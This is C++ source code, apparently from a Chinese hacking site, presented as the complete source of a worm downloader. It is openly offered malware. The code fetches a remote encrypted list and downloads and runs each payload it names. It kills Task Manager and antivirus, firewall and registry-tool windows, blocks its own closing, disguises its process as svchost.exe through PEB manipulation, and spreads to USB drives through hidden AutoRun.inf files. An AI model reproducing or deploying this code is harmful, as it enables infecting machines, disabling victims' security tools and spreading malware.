webdown.cpp1

黑色技术蠕虫下载者的完整源码

		if (hInternet != NULL)
		{
			hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0);
			if (hUrlHandle!= NULL)
			{
				memset(buf,0,100);
				InternetReadFile(hUrlHandle, buf,8, &dwSize);//先读取日期
				do
				{
					memset(buf,0,100);
					if (!InternetReadFile(hUrlHandle, buf,100, &dwSize))
					{
						break;
					}
					if (!dwSize)
						break;  // Condition of dwSize=0 indicate EOF. Stop.
					else
					{
						memset(test,0,101);
						DecryptRecord(buf,dwSize,"1314");
						if(strstr(buf,"|")!=NULL)
						{
							strncpy(test,buf,strcspn(buf,"|"));
						}
						else
						{
							strncpy(test,buf,100);
						}
						//MessageBox(NULL,test,NULL,MB_OK);
						DownExec(test);
					}
					Sleep(1000);
				}while (TRUE);
				InternetCloseHandle(hUrlHandle);
				hUrlHandle = NULL;
			}
			InternetCloseHandle(hInternet);
			hInternet = NULL;
		}
		FreeLibrary(hDll);
	}
}

void DownExec(char url[])
{
	HMODULE hshell,hurlmon;
	hshell=LoadLibrary("Shell32.dll");
	hurlmon=LoadLibrary("urlmon.dll");
	HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );
	//动态加载shell32.dll中的ShellExecuteA函数
	DWORD (WINAPI *DOWNFILE)  (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);
	//动态加载Urlmon.dll中的UrlDownloadToFileA函数
	(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
	(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
	DOWNFILE(NULL,url,"c:\\pagefile.pif",0, NULL);	
	SHELLRUN(0,"open","c:\\pagefile.pif",NULL,NULL,5); 
        FreeLibrary(hshell);
        FreeLibrary(hurlmon);
}

//*************************************************
//*************************************************
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam) 
{ 
	switch(message) 
	{ 
	case WM_CREATE:
		SetTimer(hWnd,1,1000,NULL); //设置一个1号定时器,时间间隔为1秒。  
		SetTimer(hWnd,2,modify_data.WaitTime*60*1000,NULL); //设置一个2号定时器,时间间隔为20分钟。
		break;
	case WM_TIMER: 
		{ 		
			if(wParam==1) //1号定时器处理,关闭杀毒窗口
			{
				if (!modify_data.IsAnti)
					break;
				
				char hstr[MAX_PATH]; 
				char str[MAX_PATH]; 
				
				POINT CurPoint; 
				HWND hCurrent,hParent; 			
				GetCursorPos(&CurPoint); 
				hCurrent=WindowFromPoint(CurPoint); //取得鼠标所在的窗口句柄 
				hParent=hCurrent; 	
				while(GetParent(hParent)!=NULL) 
					hParent=GetParent(hParent); //h为最上层的窗口句柄 
				
				//测试是否有windows 任务管理器打开了。若有，则杀死！ 
				if(FindWindow(NULL,"Windows 任务管理器")!=NULL)
					PostMessage(FindWindow(NULL,"Windows 任务管理器"),WM_DESTROY,0,0); 
				
				//hCurrent为鼠标所在的窗口句柄。h为鼠标所在的窗口最高层的窗口句柄. 
				GetWindowText(hParent,str,MAX_PATH); //快速的测查是否有杀毒或者有用来结束该进程的工具在运行。if(true)KILL YOU！ 
				GetWindowText(hCurrent,hstr,MAX_PATH); //快速的测查是否有杀毒或者有用来结束该进程的工具在运行。if(true)KILL YOU！ 
				if((strstr(str,"兔子") || 
					strstr(str,"任务") ||
					strstr(str,"优化") || 
					strstr(str,"注册表") ||
					strstr(str,"Process") ||
					strstr(str,"进程") ||
					strstr(str,"毒") || 
					strstr(str,"木马") || 
					strstr(str,"天网") || 
					strstr(str,"防火墙") || 
					strstr(hstr,"兔子")|| 
					strstr(hstr,"任务")||
					strstr(hstr,"优化")||
					strstr(hstr,"注册表") ||
					strstr(hstr,"Process")|| 
					strstr(hstr,"进程")|| 
					strstr(hstr,"毒")|| 
					strstr(hstr,"木马")|| 
					strstr(hstr,"天网")||
					strstr(hstr,"防火墙")) 
					&& hCurrent)
				{//多搞几次，以防有漏网之鱼
					PostMessage(hCurrent,WM_DESTROY,0,0); //给鼠标所在的窗口发送WM_DESTROY消息。推毁窗口 
					PostMessage(hParent,WM_CLOSE,0,0); //给鼠标所在的父窗口发送WM_CLOSE消息。关闭窗口 
					PostMessage(hCurrent,WM_CLOSE,0,0); //给鼠标所在的父窗口发送WM_CLOSE消息。关闭窗口 
					PostMessage(hParent,WM_DESTROY,0,0); //给鼠标所在的窗口发送WM_DESTROY消息。推毁窗口 
				} 
			}
			else if(wParam==2) //2号定时器处理,下载文件并运行
			{
				if(GetDownFileDate(modify_data.DownFile,DownFileDate2))//可以下载
				{
					if (strncmp(DownFileDate1,DownFileDate2,8)!=0)//下载列表时间不一样
					{//表示需要下载文件
						DownFiles(modify_data.DownFile);
						strcpy(DownFileDate1,DownFileDate2);
						char DownFile[256];
						::GetSystemDirectory(DownFile,sizeof(DownFile));
						strcat(DownFile,"\\DownList.ini"); 
						FILE *fp1=fopen(DownFile,"wb");
						if(fp1!=NULL)
						{
							fwrite(DownFileDate2,sizeof(char),8,fp1);
							fclose(fp1);
							SetFileAttrib(DownFile);
						}	 
					}	
				}
			}
		}
		break;
	case WM_DEVICECHANGE://USB设备消息
		if(modify_data.IsUpan)
			OnDeviceChange(hWnd,wParam,lParam);
		break;
	case WM_CLOSE: 
		return FALSE; //不允许关闭该程序。 
	case WM_DESTROY: 
		return FALSE; //不能推毁该程序。
	default:
		return DefWindowProc(hWnd,message,wParam,lParam);
	}
	return 0;
}

 //------------将该进程伪装为svchost.exe----------
void ByPassFireWall()
{
	char szpath[64];
	static char modulepath[128];//一定是全局变量,why?
    GetSystemDirectory(szpath,64);
    strcat(szpath,"\\svchost.exe");
    //转化为Unicode字符
	for (int i=0;i<64;i++)
    {
        modulepath[i*2] = szpath[i];
        modulepath[i*2+1] = 0;
    }
    __asm
    {            
            MOV EAX, fs:[30h]           
            MOV EAX, [EAX+0xC]          
            MOV EAX, [EAX+0xC]        
            lea ebx,modulepath
            mov WORD ptr[EAX+0x24],0x60  
            mov [EAX+0x28],ebx    

            MOV EAX, fs:[30h]
            mov EAX,[EAX+0x10]       
            lea EAX,[EAX+0x3c]      
            lea ebx,modulepath
            mov [eax],ebx                 //ImagePathName->Buffer
            mov WORD ptr[eax-4],0x60     //ImagePathName->Length

            MOV EAX, fs:[30h]
            mov EAX,[EAX+0x10]           //peb->_RTL_USER_PROCESS_PARAMETERS 
            lea eax,[EAX+0x44]             //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
            lea ebx,modulepath
            mov [eax],ebx                //CommandLine-->Buffer
            mov WORD ptr[eax-4],0x60    //CommandLine-->Length
    }
}
//--------------Begin U盘传播----------------------------
BOOL CreateAutoRunFile(char*name,char *path)
{
	FILE *out;
	out=fopen(path,"w+");
	if(out)
	{
		fprintf(out,"[AutoRun]\r\n");
		fprintf(out,"open=%s\r\n",name);
		fprintf(out,"shellexecute=%s\r\n",name);
		fprintf(out,"shell\\Auto\\command=%s\r\n",name);
		fclose(out);
		return TRUE;
	}
	else
		return FALSE;
}

char FirstDriveFromMask(ULONG unitmask)
{
	char i;
	for (i = 0; i < 26; ++i)
	{
		if (unitmask & 0x1)//看该驱动器的状态是否发生了变化
			break;
		unitmask = unitmask >> 1;
	}
	return (i + 'A');
}

BOOL SetFileAttrib(char *path)
{
	return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}

BOOL CopyToUAndSet(char *U)
{
	char This_File[256];
	memset(This_File,0,sizeof(This_File));
	::GetSystemDirectory(This_File,sizeof(This_File));
	strcat(This_File,"\\IME\\svchost.exe");

	char szPath[40];
	sprintf(szPath,"%c:\\setup.exe",U[0]);//得到指向U盘的完整目录
	char szAutoFile[40];
	sprintf(szAutoFile,"%c:\\AutoRun.inf",U[0]);
	if(CreateAutoRunFile("setup.exe",szAutoFile))
		SetFileAttrib(szAutoFile);
	if(!CopyFile(This_File,szPath,FALSE))
		return FALSE;
	return SetFileAttrib(szPath);
}

LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
	char U[4];
	PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
	switch(wParam)
	{
	case DBT_DEVICEARRIVAL: //插入
		if (lpdb ->dbch_devicetype == DBT_DEVTYP_VOLUME)
		{
			PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
			U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);//得到u盘盘符
			CopyToUAndSet(U);//拷到u盘
		}
		break;
	case DBT_DEVICEREMOVECOMPLETE: //设备删除
		break;
	}
	return LRESULT();
}
//--------------End U盘传播----------------------------